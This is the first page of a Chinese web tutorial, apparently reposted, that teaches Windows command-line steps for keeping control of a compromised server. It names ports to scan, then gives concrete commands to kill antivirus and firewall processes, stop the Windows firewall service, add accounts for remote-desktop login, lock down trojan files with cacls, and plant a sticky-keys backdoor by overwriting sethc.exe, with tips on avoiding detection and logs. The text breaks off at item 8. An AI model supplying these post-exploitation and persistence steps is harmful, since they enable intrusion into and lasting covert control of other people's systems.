首页/杀毒教程/内容

10个常用菜鸟必学DOS命令

杀毒教程2024-10-05 阅读()
[摘要]当各位搞到一个shell, 或者能远程执行命令之后, 如何提权并保持肉鸡长期上线是一个难题。 本人仅根据个人经验, 旁敲侧击的谈几个常用命令, 算是抛砖引玉, 欢迎大家前来指导交流!  首先, 提...

当各位搞到一个shell, 或者能远程执行命令之后, 如何提权并保持肉鸡长期上线是一个难题。 本人仅根据个人经验, 旁敲侧击的谈几个常用命令, 算是抛砖引玉, 欢迎大家前来指导交流!

  首先, 提一下搞肉鸡, 方法很多, 1433、135、21, 80、3389、4389, 5900等端口都是常用的(有兴趣的可以下载专门的扫描器或者s扫描器)。

  另外, 说一下肉鸡的系统环境, 一般都是服务器, 所以杀毒软件、防火墙啥的相对来说还是比较牢固的, 所以如何干扰并跳过这些保护也就是提权的关键。

  最后, 如何保持这个肉鸡长久上线, 是目的所在, 显然需要设置后门或者种植木马。

  注:下文对喜欢3389直接远程登陆的用户不适用(不过善意提醒你, 你留下了登陆等很多日志, 呵呵);

  常见命令, 如ipconfig、netstat等这儿不涉及, 大家都会。

  下面转入正文。

  1.ver

  作用:查看系统版本

  实例:ver

  说明:提权第一步就是查看这个是个人机器还是服务。

  2.tasklist

  作用:列出机器的所有进程

  实例:tasklist

  说明:用它你就可以知道肉鸡的杀毒软件、防火墙是啥。 后面就好办了, 给他中马的时候, 首先本地测试, 免杀, 再种上去, 防止中马不成功, 或者留下查杀记录。 (笨的办法可以直接停止杀毒软件, 见后面命令。 不过这样管理员就肯定知道自己中木马了, 你长久控制肉鸡的目标也就要破碎了)。

  3.taskkill

  作用:杀制定名字或者pid的进程

  实例: taskkill /f /im 360safe.exe 或者 taskkill /f /pid 3389

  说明:使用它可以结束防火墙进程啥的。 因为它阻止你打开网络端口, 或者以这台肉鸡为代理进行其他扫描、入侵啥的。 当然, 也可以结束杀毒软件等。

  4.net start

  作用:列出机器所有服务或者启动某个指定的服务

  实例: net start 或者 net start w3svc(启动iis)

  说明:通过它列出的所有服务可以看到服务器安装的杀毒软件, 以及开放哪些服务。 比如有瑞星服务, 则你单独用taskkill是无法结束杀毒进程的, 只能先停止服务。

  比如有 Terminal Services则可以通过net u_ser(_去掉, 因为华夏屏蔽)增加一个帐号, 再3389登陆。

  5.net stop

  作用:停止指定的服务

  实例: net stop net stop sharedaccess (停止windows防火墙)

  说明:结合net start使用

6.cacls

  作用:设置文件权限

  实例: cacls c:\windows\mm.exe /P everyone:R 或者cacls c:\progra~1\rising\ravmond.exe /d:everyone

  说明:可以用它来保护木马文件或者禁止某个程序(如杀毒软件)运行。 这个在有时候, 我们taskkill某个进程, 发现马上又起来了比较有用。

  设置为/d:everyone,任何人无法访问, 自然没法再运行。 (这一招也可以用来杀木马或者免疫:可参看http://hi.baidu.com/it%5Fsecurity/blog/item/f23295008170bb001c958348.html)

  7.&

  作用:连续执行多个命令

  实例:del c:\windows\system32\sethc.exe & del c:\windows\system32\dllcache\sethc.exe & copy c:\windows\explorer.exe c:\windows\system32\dllcache\sethc.exe & copy c:\windows\explorer.exe c:\windows\system32\sethc.exe

  说明:上面是最简单的shift按多次后跳出资源管理器下后门。 直接拷贝一次执行即可, 不用批处理拉。

  注:上面操作, 你如果一步一步操作, 早就被系统还原了, 没法实现文件替换、设置后门。

  8.echo y(北联网教程,专业提供视频软件下载)

第1页  第2页  第3页  第4页 

……

相关阅读